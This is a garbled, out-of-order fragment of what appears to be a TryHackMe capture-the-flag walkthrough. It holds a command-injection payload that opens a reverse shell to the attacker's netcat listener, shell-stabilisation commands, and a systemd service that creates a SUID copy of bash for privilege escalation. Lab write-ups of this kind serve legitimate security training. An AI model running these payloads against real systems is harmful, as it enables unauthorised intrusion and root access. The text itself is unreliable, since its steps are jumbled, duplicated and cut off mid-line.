Cct2019 Tryhackme Instant

[Unit] Description=Privilege escalation [Service] Type=simple User=mandy ExecStart=/bin/bash -c 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash'

[Install] WantedBy=multi-user.target

Check /var/www/html for config files – sometimes credentials are hardcoded. find / -name user.txt 2>/dev/null Likely in /home/mandy/user.txt . But you don’t have read access yet. Step 4 – Privilege Escalation 4.1 Check Sudo Rights sudo -l If you see: cct2019 tryhackme

Run:

127.0.0.1; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> 4444 > /tmp/f You should catch a shell as www-data . 3.1 Stabilize Shell python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty raw -echo; fg 3.2 Enumerate System Check /home for users: cat /tmp/f | /bin/sh -i 2&gt

nc -lvnp 4444